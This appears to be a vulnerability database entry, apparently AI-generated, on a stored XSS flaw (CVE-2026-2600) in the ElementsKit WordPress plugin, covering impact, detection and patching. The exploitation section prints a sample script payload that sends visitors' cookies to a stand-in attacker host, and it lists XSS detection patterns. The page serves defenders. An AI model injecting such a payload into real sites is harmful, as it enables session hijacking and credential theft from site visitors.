
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-2600 is a Stored Cross-Site Scripting (XSS) vulnerability in the ElementsKit Elementor Addons and Templates plugin for WordPress, affecting all versions up to and including 3.7.9. The flaw exists in the ekit_tab_title parameter of the Simple Tab widget due to insufficient input sanitization and output escaping on user-supplied attributes. It was published on April 4, 2026, with a patch available in version 3.8.0 and later. The vulnerability carries a CVSS v3.1 base score of 6.4 (Medium) (GitHub Advisory, Wordfence).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting). The vulnerability arises because the ekit_tab_title parameter in the Simple Tab widget does not properly sanitize or escape user-supplied input before rendering it in the page output. An authenticated attacker with at minimum contributor-level access can craft a malicious payload in the tab title field, which is then persistently stored and executed in the browser of any user who visits the affected page. The specific code change addressing the flaw is visible in the plugin's SVN changeset (WordPress Trac, GitHub Advisory).
Successful exploitation allows authenticated attackers with contributor-level access or above to persistently inject arbitrary JavaScript into WordPress pages, affecting all site visitors who load the compromised content. The injected scripts execute in the context of the victim's browser session, enabling session hijacking, credential theft, malicious redirects, or defacement. While availability is not directly impacted, the confidentiality and integrity of user data and site content are at risk, and the persistent nature of stored XSS means the payload continues to execute until removed (GitHub Advisory, Wordfence).
A public proof-of-concept (PoC) repository was published on GitHub approximately two weeks after initial disclosure (GitHub PoC). As of the time of reporting, there is no confirmed evidence of active in-the-wild exploitation, and the vulnerability has not been added to the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.01% (2nd percentile), indicating a low near-term exploitation probability. Exploitation requires only contributor-level authentication, which lowers the barrier for abuse on sites with open or loosely managed contributor accounts (GitHub Advisory, Feedly).
ekit_tab_title parameter field, enter a crafted XSS payload such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an event-handler-based variant.ekit_tab_title field; unusual page edits by low-privileged users.wp_posts or wp_postmeta containing <script>, javascript:, or event handler attributes (e.g., onerror=, onload=) within tab title fields of ElementsKit widgets.Update the ElementsKit Elementor Addons and Templates plugin to version 3.8.0 or later, which contains the fix for improper output escaping in the Simple Tab widget (WordPress Trac). For sites unable to patch immediately, restrict contributor-level access to trusted users only and audit existing pages for injected malicious scripts in tab title fields. A web application firewall (WAF) with XSS filtering rules can provide an additional layer of defense while patching is pending (Wordfence, GitHub Advisory).
Sucuri included CVE-2026-2600 in their April 2026 vulnerability patch roundup, highlighting it as part of a broader set of WordPress plugin issues requiring attention (Sucuri Blog). Wordfence, the assigning CNA, published a threat intelligence entry with remediation guidance shortly after disclosure. General community reaction has been routine for a medium-severity stored XSS in a popular WordPress plugin, with no significant controversy or widespread alarm noted.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."